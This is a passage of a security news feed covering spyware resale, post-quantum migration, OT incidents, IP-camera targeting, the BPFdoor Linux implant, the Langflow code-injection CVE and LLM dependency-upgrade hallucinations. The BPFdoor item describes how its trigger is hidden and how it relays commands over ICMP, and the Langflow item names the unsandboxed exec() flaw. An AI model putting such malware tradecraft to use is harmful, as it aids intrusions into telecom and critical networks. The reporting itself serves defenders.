For example, while Coruna was originally deployed against highly specific targets, Google Threat Intelligence observed UNC6353 embedding it within invisible iframes on compromised Ukrainian websites. Additionally, a Chinese threat group tracked as UNC6691 removed the framework's geolocation restrictions to distribute it across cryptocurrency scam sites. UNC6691's deployment featured custom modules designed specifically for cryptocurrency theft, marking a significant departure from Coruna's original espionage focus.

Google researchers noted: "It’s not known whether the additional code was accomplished by the second-hand broker, or by the threat actors themselves, but we consider it highly likely that both Coruna and DarkSword were acquired and then modified to conduct financial theft as well as espionage."

## State-Level Capabilities Reach Financially Motivated Actors

Coruna is not the first advanced cyber capability to transition into Russian possession, and DarkSword represents the latest in a series of commercial surveillance tools utilized by non-state actors. However, the current environment demonstrates these tools migrating further down the resource chain to financially motivated groups.

Albrecht notes that the transfer of capabilities between state intelligence apparatuses and criminal organizations aligns with documented operational models. "We should consider Russia’s well documented use of criminal proxy groups to target Ukraine and to conduct financial theft," he says. "The relationship between Russian Intelligence organizations and various Russian cybercriminal groups, such as a partnership between RomCom and Trickbot, essentially functions as a modern-day privateer model."

This dynamic results in lower-tier threat actors operating with state-level technical capabilities. As Cole observes, "Coruna has 23 vulnerabilities across five chains. It probably costs $30 million to $40 million to develop something like that," a development cost far exceeding typical non-government malware.

## Defending Against Advanced Mobile Threats

As premium surveillance capabilities continue to proliferate to financially motivated threat actors, organizations that previously considered themselves outside the scope of advanced persistent threats (APTs) must update their defensive models.

Albrecht advises security leaders to prioritize advanced mobile protections and visibility platforms. "Consider that malware like this pulls entire keychains and credentials off of the device in minutes," he says. "At this point the risk isn’t only to the mobile device itself, because the attacker now has credentials and can merely log in to the corporate network. They have all Wi-Fi credentials, so their level of access and potential for lateral movement is elevated. Without visibility and protection on the iOS devices there’s no protection beyond what the OS provides to stop these attacks, and there’s certainly no visibility to know how and where the attack started."

Cole reinforces this assessment, noting that while Apple has patched the specific vulnerabilities utilized by these frameworks...
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Preparing for Google&apos;s 2029 post-quantum cryptography timeline</title>
        <link>https://security.shortwaves.live/blog/67f1e0ab-9cdc-48da-b354-e732a1cda69d</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/67f1e0ab-9cdc-48da-b354-e732a1cda69d</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:15 GMT</pubDate>
        <description>Google has committed to integrating post-quantum cryptography (PQC) across its infrastructure by the end of 2029, with a specific focus on protecting authentication services. Security teams can begin preparing today by conducting cryptographic inventories, building crypto agility, and confirming vendor migration roadmaps.</description>
        <content:encoded><![CDATA[
            Google has established a timeline to integrate post-quantum cryptography (PQC) across its systems, products, and services by the end of 2029. Detailed in a recent announcement by Heather Adkins, vice president of security engineering, and Sophie Schmieg, senior staff cryptography engineer at Google, the migration aims to safeguard digital infrastructure against the evolving capabilities of quantum computation.

While quantum computers promise significant advancements in science, they also introduce risks to current authentication and encryption methodologies. As this technology becomes more accessible, unauthorized parties may use it to bypass existing security controls. To protect users and data, organizations like Google, Apple, and various public sector entities are prioritizing cryptographic algorithms designed to resist quantum computation. This transition is guided by the National Institute of Standards and Technology (NIST), which published its first finalized PQC standards in 2024.

## Google's post-quantum migration strategy

Google’s transition focuses on safely migrating to a post-quantum state within NIST’s current guidelines. The company has already begun rolling out PQC within its internal operations and products, centering its efforts on three areas: maintaining crypto agility, securing critical shared infrastructure, and supporting ecosystem-wide shifts to create a more resilient long-term security architecture.

A key detail in Google's updated threat model is the specific prioritization of authentication services. While encryption faces immediate exposure from "store-now-decrypt-later" data collection—where unauthorized parties gather encrypted data today to decrypt it once quantum technology matures—digital signatures represent a future risk that requires a transition to PQC before a Cryptographically Relevant Quantum Computer (CRQC) is developed. Google recommends that engineering teams prioritize PQC migration for authentication services to protect digital signatures and online security.

Supporting this 2029 commitment, Android 17 will integrate PQC digital signature protection using the Module-Lattice-Based Digital Signature Algorithm (ML-DSA). This addition expands upon previously announced post-quantum support within Google Chrome and Google Cloud.

## Preparing systems for the quantum transition

Security experts emphasize that a 2029 timeline is manageable and represents a proactive security posture. Melina Scotto, a cybersecurity executive adviser and chief information security officer, notes that while not every organization has Google's resources, engineering teams can prioritize intermediate protective measures, such as implementing strong salting techniques. Adding this layer of randomness to cryptographic processes increases the effort, cost, and time required for unauthorized parties to compromise data using precomputed methods, providing valuable interim protection while comprehensive encryption solutions are finalized.

Dustin Moody from NIST advises that falling behind on quantum preparation introduces broader risks, including future interoperability issues with partners who prioritize PQC. For organizations beginning this process, Moody recommends focusing on methodical preparedness rather than urgency.

Teams can strengthen their posture by taking the following steps:

* Conduct a cryptographic inventory: Build awareness by identifying exactly where and how cryptography is currently used within the environment.

* Engage service providers: Since many organizations rely on third-party solutions, engage with cloud platforms, VPN vendors, and software partners to confirm their specific post-quantum migration plans.

* Design for crypto agility: Ensure systems are built to adapt as cryptographic standards evolve over time.

* Protect sensitive data: Assign the highest priority to systems that protect long-lived sensitive data requiring confidentiality well into the future.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Operational Technology Security Incidents With Physical Consequences Decline by 25%</title>
        <link>https://security.shortwaves.live/blog/aafdbfce-f042-4cfa-87e7-18a65b34a2f9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/aafdbfce-f042-4cfa-87e7-18a65b34a2f9</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:14 GMT</pubDate>
        <description>A recent report indicates a 25% drop in physically impactful OT security incidents in 2025. We review the data, the underlying factors driving this change, and why event severity remains high despite the lower overall volume.</description>
        <content:encoded><![CDATA[
            The volume of major operational technology (OT) security incidents declined in 2025, marking the first reduction in seven years. Security metrics rarely show a downward trend without significant changes in the scene, making this anomaly an important data point for evaluating industrial defense strategies.

Historically, the number of OT incidents resulting in physical consequences for affected organizations has consistently grown, rising from a few isolated events prior to 2019 to 76 recorded incidents in 2024. According to the newly published annual report from Waterfall Security Solutions, 2025 deviated from this pattern. The organization identified 57 physically impactful OT incidents over the year. A 25% decrease that brings the total below both 2024 and 2023 levels.

Understanding the drivers behind this shift helps security teams anticipate future trends and focus their resources effectively.

## Factors influencing the decline

Researchers propose three primary hypotheses for the reduction in public OT incidents last year.

The first suggests that improved security practices are successfully protecting critical systems and giving defenders an edge. While difficult to measure comprehensively, this theory contrasts with the nature of some incidents that still occurred. For example, in January 2025, an unauthorized individual in Italy gained access to a system that allowed them to alter the routes of oil tankers and transport ships in the Mediterranean Sea. Andrew Ginter, vice president of industrial security at Waterfall Security Solutions, notes that threat actors frequently access exposed human-machine interfaces (HMIs) using default or compromised credentials. As a foundational protective measure, he strongly recommends that organizations ensure all HMIs are removed from the public internet.

A second hypothesis points to a decrease in public reporting. While many jurisdictions have implemented stricter disclosure regulations in recent years, these rules do not universally apply to all regions experiencing frequent OT incidents. Furthermore, aggregated reporting in sectors like European critical infrastructure often anonymizes the data before it reaches the public. Legal liabilities also play a role. Following cases where organizations faced legal action over initial incident disclosures—such as Marquis initiating a lawsuit against its firewall vendor SonicWall in early 2025 for allegedly underestimating an incident's impact, legal counsel frequently advises companies to limit public details strictly to what the law mandates.

The most prominent theory links the decline to a temporary reduction in ransomware events, which drove the majority of major OT incidents in the early 2020s. Law enforcement actions in the United States and Russia recently disrupted the incentive structures and operations of major ransomware groups, providing a temporary reprieve for OT environments. However, Ginter anticipates that this ecosystem is stabilizing. As new entities step in to provide the necessary technical infrastructure, organizations should prepare for activity to normalize in 2026.

## Technical complexity and event severity

Beyond frequency, the technical complexity of public OT incidents in 2025 was generally lower than in previous years. While 2024 saw the discovery of multiple new OT-specific malware strains—demonstrating a capacity to write custom code to implement protocols for programmable logic controllers (PLCs) and remote terminal units, 2025 lacked similar novel developments. Threat actors primarily relied on established methods and general IT-focused tools rather than specialized industrial protocols.

Exceptions to this lower technical complexity were observed in geopolitical contexts, such as the ongoing Russia-Ukraine conflict. Additionally, unconfirmed reports suggested sophisticated knowledge of anti-aircraft systems was leveraged against facilities in Iran and Venezuela in 2025, though reliable public details remain limited.

Despite the drop in volume and technical novelty, the severity of the incidents that did occur remained high. The security event affecting Jaguar Land Rover, for instance, resulted in an estimated $1 billion in direct losses and a $2.5 billion impact on the broader United Kingdom economy.

Additionally, politically motivated threat actors demonstrated continued interest in critical infrastructure. In one instance, unauthorized parties gained widespread access to Poland's solar and wind infrastructure. While they rendered an undisclosed number of automation devices inoperable, the event did not ultimately disrupt power delivery.

Overall, while incidents with physical consequences dropped 25%, the report found that targeting of critical infrastructure without physical disruption doubled over the same period. The data indicates that while the total number of physical disruptions decreased last year, the underlying risk to operational technology remains significant, requiring sustained, proactive defense.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Nation-state actors increasingly target exposed IP cameras for intelligence and physical targeting</title>
        <link>https://security.shortwaves.live/blog/ac3fa6da-1e3a-4848-a2be-697ea295255b</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/ac3fa6da-1e3a-4848-a2be-697ea295255b</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:14 GMT</pubDate>
        <description>Recent geopolitical conflicts have driven threat actors to leverage compromised internet-connected cameras and cyber-physical systems for operational visibility. Security researchers emphasize that organizations must actively manage shadow IT and secure legacy IoT devices to avoid exposure in opportunistic scanning campaigns.</description>
        <content:encoded><![CDATA[
            Internet-connected cameras have shifted from being primary targets for botnet operators to strategic assets in geopolitical conflicts. Russian and Ukrainian forces have accessed cameras to gather intelligence, while a joint US-Israeli mission reportedly relied on connected cameras prior to a fatal strike on Iran's leader. Furthermore, Iranian actors have leveraged compromised devices for operational support and physical targeting.

Reports including the Financial Times and Associated Press indicate that Israel and the US accessed Iran's traffic camera network. Infrastructure the government used to monitor protesters—to track the movements of Ayatollah Ali Khamenei prior and a February 28 military strike. Following this event, Check Point Software reported that Iranian threat actors increased scanning and access attempts against camera networks in Israel, Qatar, Bahrain, Kuwait, the United Arab Emirates, and Cyprus.

This shift demonstrates that unauthorized access to IP cameras has evolved. Instead of merely co-opting devices for botnets, threat actors now prioritize intelligence gathering. Noam Moshe, a lead vulnerability researcher with cyber-physical security firm Claroty, notes a definitive transition toward controlling these devices for military, intelligence, and political purposes.

Sergey Shykevich, threat intelligence group manager at Check Point Research, explains that unauthorized camera access provides threat actors with direct visibility into targeted regions. He advises that leaving cameras unpatched or using default manufacturing credentials remains a primary security gap that organizations must close.

## Operational visibility through exposed devices

Historically, unauthorized access to cyber-physical systems was viewed as a serious but somewhat theoretical concern, with notable exceptions like the Stuxnet incident and the early stages of the Ukraine conflict. Today, accessing IP cameras to aid targeting and conduct battle damage assessment offers concrete, immediate value to nation-states.

As regional conflicts persist, Iranian-affiliated actors have broadened their scope to include private sector targets and industrial control systems, such as supervisory control and data acquisition (SCADA) systems and programmable logic controllers (PLCs), according to Moshe. Rather than strictly targeting specific organizations, these proxy groups conduct opportunistic scanning for exposed cyber-physical devices affiliated with particular countries. Organizations may find themselves caught in the geopolitical crossfire simply because their assets are externally exposed.

Security improvements by camera and Internet of Things (IoT) manufacturers have reduced the prevalence of easily accessible enterprise devices. Silas Cutler, a principal security researcher at Censys, points out that enterprise deployments are typically secured within private networks. The most frequently exposed hardware tends to be self-managed consumer devices.

## Securing legacy and shadow infrastructure

Legacy devices inadvertently connected to the public internet remain a primary source of exposure. Additionally, public benefit access to municipal traffic cameras can introduce security risks. Cutler recommends that organizations actively inventory their networks for shadow IT and outdated technology connected to the public internet.

When an unauthorized party discovers an exposed camera, they still need time to analyze the feed and determine its operational value. Moshe, who presented research on four vulnerabilities in Axis cameras at the Black Hat USA conference, explains that this analysis phase provides organizations with a window to detect and mitigate the exposure before the feed can be used effectively.

Maintaining defense in depth remains the most reliable strategy for protecting enterprise environments. Shykevich recommends that organizations regularly scan their own IP ranges to identify unprotected devices and apply missing patches. Establishing strong security hygiene, such as enforcing sturdy password policies and placing IoT devices behind firewalls with intrusion prevention capabilities—creates a resilient barrier against opportunistic scanning.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Red Menshen evolves BPFdoor implant to maintain covert access in global telecommunications</title>
        <link>https://security.shortwaves.live/blog/f23b8e7e-785f-4f6e-a28a-89fcfd0b32f9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/f23b8e7e-785f-4f6e-a28a-89fcfd0b32f9</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:14 GMT</pubDate>
        <description>The advanced persistent threat group Red Menshen has upgraded its BPFdoor Linux kernel implant to better evade detection within telecommunications, government, and critical infrastructure networks. By hiding triggers in standard HTTPS and ICMP traffic, the malware presents new visibility challenges that require security teams to adopt proactive, kernel-level threat hunting.</description>
        <content:encoded><![CDATA[
            Threat actors operating under the Red Menshen designation (also tracked as Earth Bluecrow) have modified the BPFdoor malware to maintain highly stealthy persistence within global telecommunications systems, government networks, and critical infrastructure.

BPFdoor operates within the Linux kernel. It passively uses the Berkeley Packet Filter (BPF) to inspect incoming network traffic for a specific activation message, remaining dormant and difficult to observe until triggered. Researchers at Rapid7 report that Red Menshen has recently refined this listening mechanism. Since late last year, the group has implemented additional evasion techniques to remain undetected while operating near the core of global telecommunications subscriber traffic.

While earlier telemetry identified affected organizations in the Middle East and Africa, Rapid7's Christiaan Beek confirms that the campaign is global, with established persistence in the Asia-Pacific (APAC) region and Europe. Originally focused on telecommunications, the threat actor has also expanded its targeting to include government, critical infrastructure, and defense networks.

## Evolution of a sophisticated telecommunications backdoor

Previously, BPFdoor monitored a wide range of network packets for its activation sequence. The updated implant now strictly looks for its trigger within standard Hypertext Transfer Protocol Secure (HTTPS) requests. By hiding the activation sequence within Transport Layer Security (TLS) traffic, the malware easily passes through standard firewalls and traffic inspection tools. Once decrypted, the request appears benign to human analysts and automated security solutions.

BPFdoor specifically monitors the 26th byte offset in the incoming request; if the trigger value appears at this exact location, the implant activates. Trend Micro's analysis of a recent BPFdoor controller reveals that the threat actor also uses a hard-coded password and salt, verifying the MD5 hash before allowing the reverse shell to open. The controller supports TCP and ICMP protocols, allowing the operators to adapt their connection methods based on the specific network restrictions of the affected organization.

Red Menshen also exercises precise control over multiple compromised servers within a single environment using a lightweight Internet Control Message Protocol (ICMP) channel. Rather than relying on traditional, easily detectable command-and-control (C2) servers for internal lateral movement, the malware transmits instructions between infected machines using ICMP pings. A specific value—`0xFFFFFFFF`—tells a specific machine to execute the enclosed command and terminate the propagation. Beek notes that this allows the threat actor to route commands through multiple network hops to a specific target machine, blending seamlessly into routine network diagnostic traffic.

## Deep reconnaissance and process masquerading

Red Menshen demonstrates an exceptional understanding of telecommunications infrastructure. Rapid7 observed the group performing extensive reconnaissance to understand the interconnections of specific equipment inside target networks. This deep operational knowledge allows them to move swiftly and deploy custom tooling, such as localized credential sniffers, once they establish a foothold.

The threat actor adapts its implants to mimic the specific environments of its targets. Knowing that many European and Asian telecommunications providers rely on HPE ProLiant servers and increasingly use Kubernetes to manage 5G core networks, BPFdoor actively disguises itself using legitimate service names and process behaviors associated with these specific technologies.

## Proactive hunting and defense strategies

BPFdoor’s combination of passive kernel-level listening, covert ICMP messaging, and highly tailored process masquerading makes it difficult for standard endpoint security solutions to detect. Protecting these environments requires security teams to actively hunt for anomalous internal traffic patterns.

To safeguard critical infrastructure, organizations should expand defensive visibility beyond the traditional perimeter. This includes monitoring high-port network activity on Linux systems, restricting unnecessary ICMP communication between internal servers, and hunting for unauthorized BPF filters attached to network interfaces. Triage recommends working closely with infrastructure teams to ensure that logging captures the specific kernel-level telemetry needed to identify this class of persistent threat. Telecommunications providers and critical infrastructure operators must anticipate these sophisticated techniques and validate their defensive posture continuously to maintain trust and operational resilience.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Accelerated Threat Timelines: Managing Risks in AI Frameworks and Global Supply Chains</title>
        <link>https://security.shortwaves.live/blog/1632b9c8-5e82-42ca-8b78-fb895d53ac56</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/1632b9c8-5e82-42ca-8b78-fb895d53ac56</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:07 GMT</pubDate>
        <description>Recent vulnerabilities in AI frameworks and regulatory shifts in hardware procurement demonstrate a shrinking window for defensive response. This report outlines active risks across software and physical supply chains, providing actionable mitigations to help security teams maintain resilient, verified environments.</description>
        <content:encoded><![CDATA[
            The security scene today is defined by a shrinking window for defensive response, demonstrated by the rapid operationalization of a critical vulnerability in the Langflow AI framework. This development coincides with significant shifts in how national regulators and researchers view hardware and software supply chains, from the FCC’s restrictive new stance on foreign-made routers to fresh data showing that AI-assisted coding tools inadvertently introduce technical debt and vulnerabilities into enterprise environments. For security teams, the current operational environment shows that the pace of unauthorized access is accelerating. The tools organizations rely on for innovation, whether AI platforms or global hardware—require more rigorous operational oversight than ever before.

The most immediate risk involves CVE-2026-33017, a critical code injection vulnerability in Langflow, an open-source framework used to build AI agents. Within 24 hours of its disclosure, security researchers observed active scanning and unauthorized access attempts. This rapid turnaround prompted the Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities catalog on Wednesday. The speed with which threat actors transitioned including a technical advisory to functional execution indicates a maturing capability; unauthorized parties were able and construct execution sequences even without a public proof-of-concept input. This serves as a clear indicator that the gap between disclosure and potential exposure is now measured in hours, particularly for high-value AI workloads that frequently manage sensitive API keys and cloud credentials.

Volatility in the AI ecosystem extends beyond direct unauthorized utilization of the platforms themselves. New research released today by Sonatype suggests that organizations using advanced large language models like GPT-5 and Claude 4.5 to manage software dependencies may be operating under a false sense of security. An analysis of over 250,000 AI-generated upgrade recommendations found that nearly 28% of dependency upgrades were hallucinations, non-existent versions or fixes that provide no security value. Equally concerning is the tendency for these models to suggest "no change" when faced with uncertainty, effectively leaving hundreds of critical vulnerabilities unpatched in production code. The data shows that while AI reasoning capabilities are advancing, the models lack the real-time ecosystem intelligence needed to make safe remediation decisions, occasionally recommending versions that introduce more risk into the software supply chain.

As software supply chains face AI-driven instability, the physical infrastructure of the network is undergoing a regulatory shift. The Federal Communications Commission recently moved to halt approvals for specific foreign-made routers, effective March 23, citing unacceptable national security risks. The directive, influenced by findings related to threat groups like Volt Typhoon and Salt Typhoon, aims to prevent unauthorized parties from introducing access mechanisms or conducting large-scale data collection through consumer and small-office equipment. However, industry researchers warn of a potential side effect: the creation of a "zombie hardware" problem. If the market for new, approved devices becomes more constrained or expensive, small businesses and organizations may retain older, out-of-support routers far beyond their intended lifecycle, creating a different but equally demanding set of security gaps.

These supply chain complexities are further obscured by an opaque market of intermediaries. A report from the Atlantic Council details how a global network of brokers, resellers, and contractors help the distribution of commercial surveillance technology, often bypassing international trade bans and transparency requirements. These third-party firms allow specialized intrusion capabilities to move into restricted markets by creating modular supply chains that hide the origin of the technology. For security teams, this means the tools used by sophisticated threat actors are increasingly decoupled from their original manufacturers, making "Know Your Vendor" requirements a critical, though difficult, component of modern risk management.

From a technical perspective, the Langflow vulnerability (CVE-2026-33017) affects a public build endpoint designed for convenience. The flaw resides in the way the application processes optional "data" parameters, passing Python code directly to the `exec()` function without sandboxing. This allows unauthenticated remote code execution. Because Langflow instances frequently store credentials for major cloud providers and AI services, a single instance of unauthorized access can help immediate lateral movement. We recommend security teams monitor for anomalous network callbacks or unexpected shell executions originating from AI development environments.

For software engineering teams, the Sonatype research provides a clear path for mitigation: "grounding." When AI models were paired with real-time intelligence—such as version recommendation APIs and developer trust scores, critical risks were reduced by nearly 70%. Security teams should verify that any AI-assisted development tools used by their engineering departments do not operate in a vacuum, but are instead integrated with live registry data and vulnerability intelligence. Relying on an ungrounded model to suggest a security patch currently presents an elevated risk, frequently resulting in either a hallucinated version or the preservation of a known vulnerability.

Regarding network infrastructure, the FCC’s policy shift indicates that hardware origin is becoming a primary security consideration for sovereign and high-security environments. However, teams must not let the focus on hardware manufacturing distract from operational fundamentals. Research shows that most router-related security incidents still stem from administrative oversight—default credentials, exposed management interfaces, and delayed firmware updates. Rather than built-in modifications. The most effective immediate defense is a return to basics: disabling remote management, enforcing strong credentials, and applying patches as soon as they are available, regardless of the device's country of origin.

Looking forward, the convergence of these trends demonstrates that standard verification models are struggling against rapid AI adoption and supply chain opacity. We are entering an era where software dependencies are suggested by hallucinating models and hardware is procured through complex webs of intermediaries. Success for defensive teams will increasingly depend on the ability to implement runtime detection and rigorous "Know Your Vendor" protocols. The incident with Langflow shows that organizations can no longer rely on a multi-day patching cycle for high-profile vulnerabilities; teams must have the visibility and segmentation in place to isolate affected workloads the moment an advisory is published.

As these developments progress, it remains to be seen how the FCC’s exemption process for new hardware will function or how quickly domestic manufacturing can fill the gap left by the new restrictions. Furthermore, while grounding AI models significantly reduces risk, the "human in the loop" remains a potential point of failure if reviewers rely on the same incomplete data as the models they oversee. Security teams should remain focused on bridging the gap between disclosure and remediation through automated response and live intelligence feeds.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Analyzing the Role of Intermediaries in the Commercial Surveillance Market</title>
        <link>https://security.shortwaves.live/blog/797f6f1d-8c52-43e7-a3d4-969978bec88c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/797f6f1d-8c52-43e7-a3d4-969978bec88c</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:07 GMT</pubDate>
        <description>The supply chain for commercial surveillance technology is growing increasingly complex due to a network of third-party intermediaries. A recent Atlantic Council report details how these brokers and resellers obscure visibility, complicating regulatory efforts while highlighting the need for stricter &quot;Know Your Vendor&quot; requirements.</description>
        <content:encoded><![CDATA[
            Understanding the commercial surveillance market has become increasingly complex due to the proliferation of intermediaries. These entities—including software resellers, vulnerability brokers, contractors, and regional partners—often enable government and private organizations to bypass transparency regulations and trade restrictions.

A March 18 report from the Atlantic Council details how these intermediaries allow the global distribution of offensive cyber capabilities (OCC). The researchers point to specific instances, such as a South African representative distributing Memento Labs' Dante software locally, and a third-party firm facilitating the sale of Passitora's surveillance technology to Bangladesh. This latter transaction occurred despite a lack of diplomatic relations between the relevant countries and existing trade bans, demonstrating how intermediaries navigate restricted markets.

Jen Roberts, associate director of the Cyber Statecraft Initiative at the Atlantic Council and a co-author of the report, notes that this ecosystem makes market analysis challenging.

"Intermediaries can drive down transparency efforts in the marketplace for offensive cyber capabilities like spyware by muddying supply chains and creating confusion for end buyers as to where a capability or component of a capability has come from," she says. She adds that intermediaries often support procurement for countries lacking strong in-house technical resources.

The broader commercial surveillance ecosystem continues to expand, driven by demand for law enforcement investigations, intelligence gathering, and the monitoring of political opposition. In 2025, a Google Threat Intelligence Group analysis found that, for the first time, commercial surveillance vendors accounted for more zero-day utilization than traditional state-sponsored groups. Recent shifts in US policy, including the reactivation of certain contracts and the removal of specific sanctions, also appear to have eased operational constraints for some surveillance technology vendors.

## The structural role of intermediaries

The Atlantic Council's "Mythical Beasts" report series indicates that intermediaries form the operational backbone of this market. By providing specialized procurement channels, they allow nations without domestic development capabilities to acquire gray-market surveillance software while insulating the original vendors from direct oversight.

Collin Hogue-Spears, senior director of solution management at Black Duck, explains that third-party brokers and resellers effectively bypass export controls through careful corporate structuring.

"Their corporate structures exist specifically to make export controls irrelevant," he notes. "The spyware market stopped being a vendor-to-government pipeline years ago. It has evolved into a modular supply chain where intermediaries fill every gap the buyer cannot fill alone: exploit engineering, operational training, deployment infrastructure, and most importantly, a legal paper trail that hides the origin."

Julian-Ferdinand Vögele, a principal threat researcher at Recorded Future, observes that these entities lower the barrier to entry by bundling software with training and support.

"Commercial spyware operates in the shadows by design," Vögele says. "Brokers and resellers enable its spread by connecting vendors and buyers, bundling tools with support or training, and expanding into new markets, while adding opacity, obscuring relationships, and leveraging jurisdictions."

## Regulatory efforts and transparency initiatives

Recognizing the risks to affected parties, including journalists, diplomats, and civil society members, international coalitions are working to establish oversight. In February 2024, the United Kingdom and France launched the Pall Mall Process, a multilateral initiative aimed at addressing the proliferation and irresponsible use of commercial cyber intrusion capabilities. This ongoing effort brings together government entities, industry partners, and policy experts to develop standard practices and safeguards.

In response to mounting regulatory pressure, some surveillance vendors have introduced internal compliance measures. For example, NSO Group announced the establishment of a human rights compliance program, though independent researchers remain cautious about the effectiveness of self-regulation in this sector.

Roberts notes that the Pall Mall Process is currently focused on drafting an industry code of practice, meaning comprehensive evaluation of the initiative will take time. In the interim, the Atlantic Council recommends practical defensive steps for organizations and governments: implementing strict "Know Your Vendor" requirements, mandating certification for capability brokers and resellers, and maintaining clear public registries of these entities.

Establishing visibility into the procurement chain is a necessary first step for security practitioners and policymakers attempting to secure environments against these tools.

"Transparency initiatives are key to regulating intermediaries and also the spyware industry more broadly," Roberts says. "It is difficult to ultimately regulate what one cannot observe."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating AI models for software dependency decisions</title>
        <link>https://security.shortwaves.live/blog/e96f9a28-051e-424b-9813-85a7c8d6023a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/e96f9a28-051e-424b-9813-85a7c8d6023a</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:06 GMT</pubDate>
        <description>Recent analysis indicates that organizations relying on large language models for software dependency upgrades may inadvertently introduce or maintain vulnerabilities. Integrating real-time ecosystem intelligence is necessary to ensure AI-assisted development tools provide accurate, secure remediation guidance.</description>
        <content:encoded><![CDATA[
            Organizations integrating AI models into their software dependency workflows should evaluate how these tools source and verify their upgrade recommendations.

Recent research from Sonatype evaluated the performance of "frontier" models, the most advanced AI models available—when tasked with providing upgrade and patching guidance for software dependencies. The data shows that while these tools offer productivity benefits, they frequently generate fabricated or inaccurate recommendations, complicating vulnerability management and potentially increasing technical debt.

To measure this, Sonatype’s research team analyzed 36,870 unique dependency upgrade recommendations across Maven Central, npm, PyPI, and NuGet between June and August 2025. The study encompassed a total of 258,000 recommendations generated by seven AI models from Anthropic, OpenAI, and Google.

The initial phase of the study, published in February 2026 as part of the State of the Software Supply Chain report, focused on OpenAI's GPT-5. The analysis found that the model often recommended software versions, upgrade paths, or security fixes that did not exist, with nearly 28% of the recommended dependency upgrades classified as hallucinations.

A second phase of the study evaluated newer models equipped with enhanced reasoning capabilities, including GPT-5.2, Anthropic's Claude Sonnet 3.7 and 4.5, Claude Opus 4.6, and Google's Gemini 2.5 Pro and 3 Pro. While these models showed measurable improvements, they continued to generate a significant volume of fabricated recommendations. According to the report, these failures can lead to wasted AI spend, diverted developer time, unresolved vulnerability exposure, and increased technical debt before code reaches production.

## Evaluating recommendation accuracy

The research indicates that the primary limitation is not the reasoning capabilities of the models, which have advanced consistently. Instead, the models lack "ecosystem intelligence". The real-time dependency, vulnerability, compatibility, and enterprise policy context necessary to make safe remediation decisions.

Even the highest-performing models in the study fabricated approximately one out of every 16 dependency recommendations. To reduce hallucinations, frontier models often defaulted to a "no change" recommendation for about a third of the software components. However, this cautious approach resulted in the models failing to flag existing vulnerabilities. As a result, 800 and 900 critical and high-severity vulnerabilities were left unaddressed in production code during the evaluation.

In other instances, the models recommended software versions that contained known vulnerabilities. The report noted that this occasionally put the AI stack itself at elevated risk, as the libraries used to train, fine-tune, orchestrate, and serve the models were updated to vulnerable versions based on the models' own guidance.

Sonatype co-founder and CTO Brian Fox noted that inaccurate guidance from AI models creates a subtle accumulation of technical debt. While organizations generally expect AI models to make occasional errors, the research indicates that flaws in dependency recommendations are becoming quietly integrated into standard development workflows.

"The most dangerous version of this problem isn't when the model gives you something obviously broken," Fox said. "It's when it gives you something plausible that preserves risk, misses the better upgrade path, and looks close enough to ship."

## Grounding AI with real-time intelligence

The data provides a clear path forward for organizations using AI-assisted development. The study demonstrated that "grounding" AI models with live intelligence and context produces significantly safer outcomes. When comparing the ungrounded frontier models to a hybrid approach that applied real-time intelligence at inference time, the hybrid method yielded a nearly 70% reduction in critical and high risks.

To test this methodology, researchers equipped GPT-5 Nano—the smallest model in the GPT-5 family, with a single function-calling tool backed by a version recommendation API. Supplying the model with ranked upgrade candidates, vulnerability counts, and developer trust scores led to a marked reduction in vulnerabilities compared to the ungrounded frontier models.

The report found that grounding not only prevents hallucinations but also successfully steers the model toward component versions with fewer known vulnerabilities when a perfect upgrade path is unavailable.

Without live registry data, vulnerability intelligence, or compatibility context, AI models will continue to output errors that require engineering time to correct. Simply adding a human review step to the process is unlikely to prevent these issues if the reviewer is relying on the same incomplete data. As Fox explained, humans should set policies and constraints, but the systems providing recommendations must remain grounded in real-time software intelligence to support safe, effective decision-making.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Critical Vulnerability in Langflow AI Platform Requires Immediate Remediation</title>
        <link>https://security.shortwaves.live/blog/dca5435d-bee4-48df-b656-b4a7e2bef9cb</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/dca5435d-bee4-48df-b656-b4a7e2bef9cb</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:06 GMT</pubDate>
        <description>A critical code injection flaw in the Langflow AI framework (CVE-2026-33017) allows unauthenticated remote code execution. With active scanning and unauthorized access attempts observed within 24 hours of disclosure, organizations must upgrade to version 1.9.0 and implement runtime defenses immediately.</description>
        <content:encoded><![CDATA[
            According to reporting from Dark Reading, a critical vulnerability in Langflow—an open-source framework for AI agent development—has been subject to active security incidents shortly after its initial disclosure.

On Wednesday, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-33017, a critical code injection flaw, to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability carries a 9.8 CVSS score and was first disclosed on March 17, 2026. Reports of unauthorized activity emerged almost immediately.

Cloud security vendor Sysdig observed access attempts less than 24 hours after the vulnerability was disclosed. Sysdig researchers noted that malicious actors were able to use the technical details provided in the advisory to quickly construct functional code execution sequences, even though no public proof-of-concept (PoC) code was initially available.

